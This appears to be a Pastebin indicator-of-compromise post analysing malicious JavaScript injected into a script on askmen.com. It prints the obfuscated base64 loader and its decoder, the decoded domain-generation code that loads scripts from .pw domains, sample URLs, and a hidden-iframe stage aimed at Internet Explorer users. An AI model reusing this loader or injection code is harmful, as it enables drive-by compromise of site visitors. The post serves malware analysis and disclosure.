API tools faq
paste
malwageddon

IOC - www.askmen.com

malwageddon
Jun 25th, 2014
328
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 4.17 KB | None | 0 0
raw download clone embed print report
  1. // JS script at www.askmen.com/includes/js/lib/geoAnalysis.js contains the following JS at the bottom:
  2.  
  3. var s = document.createElement("SCR" + "IPT");
  4. s.text = b64dec("MzM4MjcxNjt2YXIgcXdxd3Fxd3Fxd3F3d3Fxd3d3cXFxcXc9J3FxcXFxcXF3d3d3cXdxcXFxcXd3d3F3d3cnO2Z1bmN0aW9uIGNyY1RhYmxlRygpe3ZhciBjO3ZhciBjcmNUYWJsZSA9IFtdO2Zvcih2YXIgbiA9MDsgbiA8IDI1NjsgbisrKXtjID0gbjtmb3IodmFyIGsgPTA7IGsgPCA4OyBrKyspe2MgPSAoKGMmMSkgPyAoMHhFREI4ODMyMCBeIChjID4+PiAxKSkgOiAoYyA+Pj4gMSkpO31jcmNUYWJsZVtuXSA9IGM7fXJldHVybiBjcmNUYWJsZTt9O2Z1bmN0aW9uIGNyYzMyKHN0cikge3ZhciBjcmNUYWJsZSA9IGNyY1RhYmxlRygpO3ZhciBjcmMgPSAwIF4gKC0xKTtmb3IgKHZhciBpID0gMDsgaSA8IHN0ci5sZW5ndGg7IGkrKyApIHtjcmMgPSAoY3JjID4+PiA4KSBeIGNyY1RhYmxlWyhjcmMgXiBzdHIuY2hhckNvZGVBdChpKSkgJiAweEZGXTt9cmV0dXJuIChjcmMgXiAoLTEpKSA+Pj4gMDt9O3ZhciBkID0gIi09LSI7dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBkYXRlU3RyID0gZGF0ZS5nZXRVVENGdWxsWWVhcigpICsgZCArIChkYXRlLmdldFVUQ01vbnRoKCkrMSkgKyBkICsgZGF0ZS5nZXRVVENEYXRlKCk7d2luZG93LmFybXA9ZnVuY3Rpb24ocCl7dmFyIHMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdTQ1JJUFQnKTsgcy50ZXh0ID0gYjY0ZGVjKHApLnJlcGxhY2UoL1wwKy8sJycpOyBkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHMpO307dmFyIHMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdTQ1JJUFQnKTtzLnNyYz0iaHR0cDovLyIgKyBjcmMzMihkYXRlU3RyKS50b1N0cmluZygxNikgKyAiLnB3L2JsZGUuaHRtbD8iK01hdGgucmFuZG9tKCk7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChzKTs=").replace(/\0+/, '');
  5. document.body.appendChild(s);
  6.  
  7. function b64dec(s) {
  8.     var e = {},
  9.         i, k, v = [],
  10.         r = '',
  11.         w = String.fromCharCode;
  12.     var n = [
  13.         [65, 91],
  14.         [97, 123],
  15.         [48, 58],
  16.         [43, 44],
  17.         [47, 48]
  18.     ];
  19.     for (z in n) {
  20.         for (i = n[z][0]; i < n[z][1]; i++) {
  21.             v.push(w(i));
  22.         }
  23.     }
  24.     for (i = 0; i < 64; i++) {
  25.         e[v[i]] = i;
  26.     }
  27.     for (i = 0; i < s.length; i += 72) {
  28.         var b = 0,
  29.             c, x, l = 0,
  30.             o = s.substring(i, i + 72);
  31.         for (x = 0; x < o.length; x++) {
  32.             c = e[o.charAt(x)];
  33.             b = (b << 6) + c;
  34.             l += 6;
  35.             while (l >= 8) {
  36.                 r += w((b >>> (l -= 8)) % 256);
  37.             }
  38.         }
  39.     }
  40.     return r;
  41. }
  42.  
  43. // when executed will produce another JS below
  44.  
  45. var qwqwqqwqqwqwwqqwwwqqqqw = 'qqqqqqqwwwwqwqqqqqwwwqwww';
  46.  
  47. function crcTableG() {
  48.     var c;
  49.     var crcTable = [];
  50.     for (var n = 0; n < 256; n++) {
  51.         c = n;
  52.         for (var k = 0; k < 8; k++) {
  53.             c = ((c & 1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1));
  54.         }
  55.         crcTable[n] = c;
  56.     }
  57.     return crcTable;
  58. };
  59.  
  60. function crc32(str) {
  61.     var crcTable = crcTableG();
  62.     var crc = 0 ^ (-1);
  63.     for (var i = 0; i < str.length; i++) {
  64.         crc = (crc >>> 8) ^ crcTable[(crc ^ str.charCodeAt(i)) & 0xFF];
  65.     }
  66.     return (crc ^ (-1)) >>> 0;
  67. };
  68. var d = "-=-";
  69. var date = new Date();
  70. var dateStr = date.getUTCFullYear() + d + (date.getUTCMonth() + 1) + d + date.getUTCDate();
  71. window.armp = function (p) {
  72.     var s = document.createElement('SCRIPT');
  73.     s.text = b64dec(p).replace(/\0+/, '');
  74.     document.body.appendChild(s);
  75. };
  76. var s = document.createElement('SCRIPT');
  77. s.src = "http://" + crc32(dateStr).toString(16) + ".pw/blde.html?" + Math.random();
  78. document.body.appendChild(s);
  79.  
  80. // this JS will generate a URL similar to these
  81.  
  82. http://55fd8fe0.pw/blde.html?0.5656226223404374
  83. http://22fabf76.pw/blde.html?0.3542296437611776
  84. http://be90becd.pw/nbe.html?0.5180308921262622
  85. http://9b66653c.pw/nbe.html?0.44849819945207525
  86.  
  87. // these links deliver a base64 encrypted JS. Example:
  88.  
  89. var ua = navigator.userAgent.toLowerCase();
  90. if (ua.indexOf("msie") != -1 || ((ua.indexOf("trident") != -1) && (ua.indexOf("rv:11") != -1))) {
  91.     var d = document.createElement('div');
  92.     var f = document.createElement('i' + 'fr' + 'ame');
  93.     f.setAttribute('style', 'width:100px;height:100px;position:absolute;left:-10000px;top:0;');
  94.     f.setAttribute('src', 'http://ushbnasdahfjashdajsdhu.thenettyjostoryorhowilearnedtolovehollywoodland.com/?PHPSSESID=njrMNruDMhzIFIDALOXES7tHNErPThnJkpDZw-4|MzIxNmFjZTA1ZTRkMWI5YmQ0MDZhOTY2NjgyZjU0MWU');
  95.     d.appendChild(f);
  96.     document.body.appendChild(d);
  97. }
  98.  
  99. // and this script will deliver an exploit code. In my case it was IE VML.
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!